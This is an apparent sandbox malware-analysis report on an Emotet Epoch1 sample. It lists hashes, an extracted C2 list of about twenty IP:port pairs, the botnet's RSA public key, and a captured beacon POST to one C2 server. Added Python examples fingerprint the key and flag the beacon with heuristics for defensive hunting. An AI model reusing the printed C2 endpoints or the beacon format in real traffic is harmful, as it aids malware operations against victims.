
Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
  • submitted
    28/09/2024, 08:16 UTC

General

  • Target
    fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe
  • Size
    316KB
  • MD5
    fbdfa9073f7e435f26ad9582ee23a7b7
  • SHA1
    c53875bdfa7d6df7f2b1a6238f55b7824cdc201c
  • SHA256
    c6722b179de4ab30e1bacc3bf16e458da1fbf7ffc8e56904c1ac98f351b4612c
  • SHA512
    b88a0531726072469a5a6695d8702429083aed1e97be0130451147ba845d48e1d7fd8cfa4ed6eaa07154fe0ede8f85bfd7c6bb76379a62a1c0f74724ae79a720
  • SSDEEP
    6144:a0XYxkiRDCbNniZKxVsllll9TjLcSgtvFSua5ojv7uYNx:a0XyDCbRoKslHTHitvNN

Malware Config

Extracted

  • Family
    emotet
  • Botnet
    Epoch1
  • C2
    76.168.54.203:80
    51.38.124.206:80
    38.88.126.202:8080
    54.37.42.48:8080
    5.196.35.138:7080
    177.129.17.170:443
    87.106.46.107:8080
    68.183.190.199:8080
    185.183.16.47:80
    186.103.141.250:443
    64.201.88.132:80
    70.32.84.74:8080
    68.69.155.181:80
    82.76.111.249:443
    111.67.12.221:8080
    60.93.23.51:80
    104.131.41.185:8080
    92.24.50.153:80
    191.182.6.118:80
    61.197.92.216:80
  • rsa_pubkey.plain
    -----BEGIN PUBLIC KEY-----
    MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6
    uS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz
    6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB
    -----END PUBLIC KEY-----
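The extracted rsa_pubkey.plain is the key Emotet embedded in its binaries to wrap the per-session symmetric key used on the C2 channel, and each botnet epoch carried its own key, so it is a more stable pivot than the C2 list, whose addresses rotate. The following Python is an added example, not code from the report or from tria.ge: it strips the PEM armour, walks the DER SubjectPublicKeyInfo with a minimal tag/length/value reader, checks that the algorithm OID is rsaEncryption and returns the modulus size and public exponent. The PEM string is copied from the config above; the helper names (pem_to_der, read_tlv, parse_rsa_spki, summarize_emotet_key) are mine and not part of any library.

```python
import base64
import hashlib

# RSA public key copied verbatim from this report's "Malware Config" section.
EMOTET_EPOCH1_PUBKEY_PEM = """-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6
uS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz
6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB
-----END PUBLIC KEY-----"""

RSA_ENCRYPTION_OID = "1.2.840.113549.1.1.1"  # PKCS#1 rsaEncryption


def pem_to_der(pem):
    """Drop the BEGIN/END lines and base64-decode the DER body."""
    body = "".join(
        line.strip() for line in pem.strip().splitlines() if not line.startswith("-----")
    )
    return base64.b64decode(body)


def read_tlv(buf, pos):
    """Read one DER tag/length/value at buf[pos]; return (tag, value, position after it)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(raw):
    """Decode DER OID content octets to dotted notation (first octet packs two arcs)."""
    arcs = [raw[0] // 40, raw[0] % 40]
    val = 0
    for b in raw[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(str(a) for a in arcs)


def parse_rsa_spki(der):
    """Walk SubjectPublicKeyInfo -> AlgorithmIdentifier + BIT STRING(RSAPublicKey)."""
    tag, spki, _ = read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("SubjectPublicKeyInfo must be a SEQUENCE")
    tag, alg, pos = read_tlv(spki, 0)
    if tag != 0x30:
        raise ValueError("AlgorithmIdentifier must be a SEQUENCE")
    tag, oid_raw, _ = read_tlv(alg, 0)
    oid = decode_oid(oid_raw)
    if tag != 0x06 or oid != RSA_ENCRYPTION_OID:
        raise ValueError(f"not an rsaEncryption key: {oid}")
    tag, bits, _ = read_tlv(spki, pos)
    if tag != 0x03 or bits[0] != 0:
        raise ValueError("subjectPublicKey must be a BIT STRING with 0 unused bits")
    tag, rsa, _ = read_tlv(bits, 1)  # skip the unused-bits octet
    if tag != 0x30:
        raise ValueError("RSAPublicKey must be a SEQUENCE")
    tag_n, n_raw, pos = read_tlv(rsa, 0)
    tag_e, e_raw, _ = read_tlv(rsa, pos)
    if tag_n != 0x02 or tag_e != 0x02:
        raise ValueError("modulus and exponent must be INTEGERs")
    n = int.from_bytes(n_raw, "big")  # a leading 0x00 sign pad does not change the value
    e = int.from_bytes(e_raw, "big")
    return {
        "oid": oid,
        "modulus": n,
        "exponent": e,
        "bits": n.bit_length(),
        "der_sha256": hashlib.sha256(der).hexdigest(),  # stable value to pivot on across samples
    }


def summarize_emotet_key(pem=EMOTET_EPOCH1_PUBKEY_PEM):
    """Parse the report's key; hypothetical helper name."""
    return parse_rsa_spki(pem_to_der(pem))


if __name__ == "__main__":
    info = summarize_emotet_key()
    print(f"RSA-{info['bits']} e={info['exponent']} der_sha256={info['der_sha256']}")
```

On this key the parser returns a 768-bit modulus with e=65537: far below any current minimum for RSA, but consistent with the size Emotet used for its epoch keys at the time, and another reason the key is a recognisable fingerprint. The SHA-256 of the DER encoding is the value to store alongside the C2 list when hunting for other Epoch1 samples.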

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Emotet payload 3 IoCs

    Detects Emotet payload in memory.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:5560
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4768,i,2904906934812054273,11716976550456127484,262144 --variations-seed-version --mojo-platform-channel-handle=948 /prefetch:8
    1⤵
      PID:3264

    Network

    • DNS PTR 8.8.8.8.in-addr.arpa via 8.8.8.8:53 (US) -> dns.google
    • DNS PTR 228.249.119.40.in-addr.arpa via 8.8.8.8:53 (US) -> empty answer
    • DNS PTR 88.210.23.2.in-addr.arpa via 8.8.8.8:53 (US) -> a2-23-210-88.deploy.static.akamaitechnologies.com
    • DNS PTR 68.159.190.20.in-addr.arpa via 8.8.8.8:53 (US) -> empty answer
    • DNS PTR 95.221.229.192.in-addr.arpa via 8.8.8.8:53 (US) -> empty answer
    • DNS PTR 196.249.167.52.in-addr.arpa via 8.8.8.8:53 (US) -> empty answer
    • DNS PTR 28.118.140.52.in-addr.arpa via 8.8.8.8:53 (US) -> empty answer
    • DNS A fe3cr.delivery.mp.microsoft.com via 8.8.8.8:53 (US) -> CNAME fe3.delivery.mp.microsoft.com -> CNAME glb.cws.prod.dcat.dsp.trafficmanager.net -> A 13.95.31.18
    • DNS PTR 50.23.12.20.in-addr.arpa via 8.8.8.8:53 (US) -> empty answer
    • DNS PTR 15.164.165.52.in-addr.arpa via 8.8.8.8:53 (US) -> empty answer
    • HTTP POST http://51.38.124.206/tPBMt/58nkUEFibX1aRuT8b/ from fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe to 51.38.124.206:80 (DE)
      Request
      POST /tPBMt/58nkUEFibX1aRuT8b/ HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      DNT: 1
      Connection: keep-alive
      Referer: 51.38.124.206/tPBMt/58nkUEFibX1aRuT8b/
      Upgrade-Insecure-Requests: 1
      Content-Type: multipart/form-data; boundary=---------xltowVctQ
      Host: 51.38.124.206
      Content-Length: 4596
      Cache-Control: no-cache
      Response
      HTTP/1.1 404 Not Found
      Date: Sat, 28 Sep 2024 08:17:04 GMT
      Server: Apache/2.4.52 (Ubuntu)
      Content-Length: 275
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=iso-8859-1
    • DNS PTR 206.124.38.51.in-addr.arpa via 8.8.8.8:53 (US) -> vps-745068dd.vps.ovh.net
    • DNS PTR 83.210.23.2.in-addr.arpa via 8.8.8.8:53 (US) -> a2-23-210-83.deploy.static.akamaitechnologies.com
    Connections

    TCP flows opened by fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe (bytes and packets sent / received):

    Destination           Sent    Received  Pkts out  Pkts in  Notes
    76.168.54.203:80      260 B   -         5         -        nothing received
    51.38.124.206:80      5.8kB   796 B     16        7        http: POST http://51.38.124.206/tPBMt/58nkUEFibX1aRuT8b/ -> 404
    38.88.126.202:8080    260 B   -         5         -        nothing received
    54.37.42.48:8080      260 B   -         5         -        nothing received
    5.196.35.138:7080     260 B   200 B     5         5
    177.129.17.170:443    260 B   -         5         -        nothing received
    87.106.46.107:8080    260 B   -         5         -        nothing received
    68.183.190.199:8080   208 B   -         4         -        nothing received

    DNS exchanges with 8.8.8.8:53 (one row per UDP flow; the 28.118.140.52 flow carried two queries):

    Query                                                         Sent    Received  Pkts out  Pkts in
    8.8.8.8.in-addr.arpa (PTR)                                    66 B    90 B      1         1
    228.249.119.40.in-addr.arpa (PTR)                             73 B    159 B     1         1
    88.210.23.2.in-addr.arpa (PTR)                                70 B    133 B     1         1
    68.159.190.20.in-addr.arpa (PTR)                              72 B    158 B     1         1
    95.221.229.192.in-addr.arpa (PTR)                             73 B    144 B     1         1
    196.249.167.52.in-addr.arpa (PTR)                             73 B    147 B     1         1
    28.118.140.52.in-addr.arpa (PTR) and
    fe3cr.delivery.mp.microsoft.com (A -> 13.95.31.18)            149 B   323 B     2         2
    50.23.12.20.in-addr.arpa (PTR)                                70 B    156 B     1         1
    15.164.165.52.in-addr.arpa (PTR)                              72 B    146 B     1         1
    206.124.38.51.in-addr.arpa (PTR)                              72 B    110 B     1         1
    83.210.23.2.in-addr.arpa (PTR)                                70 B    133 B     1         1
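The traffic above has the shape of an Emotet check-in rather than anything a browser would produce: every C2 in the config is contacted by bare IP with no preceding DNS lookup, and the one host that answered received a multipart/form-data POST to a path of random-looking mixed-case segments, carrying a Firefox User-Agent that claims Windows NT 6.3 (Windows 8.1) from a Windows 10 sandbox and a Referer that merely repeats the request's own host and path without a scheme. The 404 from a live Apache shows the server is up but no longer serving this path, as expected for a sample whose C2 path scheme has long since rotated. The Python below is an added example, not code from the report or from tria.ge: it runs those heuristics over the request as captured. The request text is rebuilt from the headers shown on the page (the 4596-byte body was not shown and is omitted), the benign comparison request is constructed for contrast, the expected "Windows NT 10.0" token comes from the analysis platform listed at the top of the report, and the function names are hypothetical.

```python
import ipaddress
import re

# The C2 POST from this report's Network section, reconstructed from the headers shown
# there; the multipart body was not on the page and is omitted.
EMOTET_POST = """POST /tPBMt/58nkUEFibX1aRuT8b/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: 51.38.124.206/tPBMt/58nkUEFibX1aRuT8b/
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------xltowVctQ
Host: 51.38.124.206
Content-Length: 4596
Cache-Control: no-cache
"""

# Constructed benign upload for comparison; not from the page.
BENIGN_POST = """POST /api/v1/upload HTTP/1.1
Host: files.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Referer: https://files.example.com/app/
Content-Type: multipart/form-data; boundary=abc
Content-Length: 100
"""

# One URL path segment: 4-24 alphanumerics, no extension, no punctuation.
SEGMENT = re.compile(r"^[A-Za-z0-9]{4,24}$")


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (method, path, {lowercased header: value})."""
    lines = raw.strip().splitlines()
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_ip_literal(host):
    """True if the Host header is an IP address (IPv4, or IPv6 without brackets) rather than a name."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def random_looking_path(path):
    """True when every segment is a bare alphanumeric token in mixed case, as in /tPBMt/58nkUEFibX1aRuT8b/."""
    segments = [s for s in path.split("/") if s]
    if not segments:
        return False
    for s in segments:
        if not SEGMENT.match(s) or s == s.lower() or s == s.upper():
            return False
    return True


def beacon_findings(raw, expected_nt_version="10.0"):
    """Return the list of heuristic indicators that fire on one request head."""
    method, path, h = parse_request(raw)
    findings = []
    host = h.get("host", "")
    if is_ip_literal(host):
        findings.append("host-is-ip-literal")
    referer = h.get("referer", "")
    if referer:
        if re.sub(r"^https?://", "", referer) == host + path:
            findings.append("self-referer")  # Referer is the request's own URL
        if not re.match(r"^https?://", referer):
            findings.append("referer-missing-scheme")  # no browser sends this
    content_type = h.get("content-type", "")
    if method == "POST" and content_type.startswith("multipart/form-data") and random_looking_path(path):
        findings.append("multipart-post-random-path")
    m = re.search(r"Windows NT (\d+\.\d+)", h.get("user-agent", ""))
    if m and m.group(1) != expected_nt_version:
        findings.append("ua-os-mismatch")  # UA claims a different Windows than the host runs
    return findings


def is_probable_beacon(raw, expected_nt_version="10.0", threshold=3):
    """Score rather than single-signal: each check alone has benign explanations."""
    return len(beacon_findings(raw, expected_nt_version)) >= threshold


if __name__ == "__main__":
    print("emotet:", beacon_findings(EMOTET_POST))
    print("benign:", beacon_findings(BENIGN_POST))
```

All five checks fire on the captured request and none on the benign one. Each is a weak signal by itself (internal tooling posts to bare IPs, and some proxies rewrite Referer), which is why is_probable_beacon scores them rather than alerting on one; the config's C2 list belongs on a blocklist regardless, since the heuristics only help with the addresses the config does not already name.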


    Downloads

    • memory/5560-1-0x00000000021B0000-0x00000000021C2000-memory.dmp
      Filesize 72KB
    • memory/5560-6-0x00000000022E0000-0x00000000022F0000-memory.dmp
      Filesize 64KB
    • memory/5560-0-0x00000000021A0000-0x00000000021AF000-memory.dmp
      Filesize 60KB
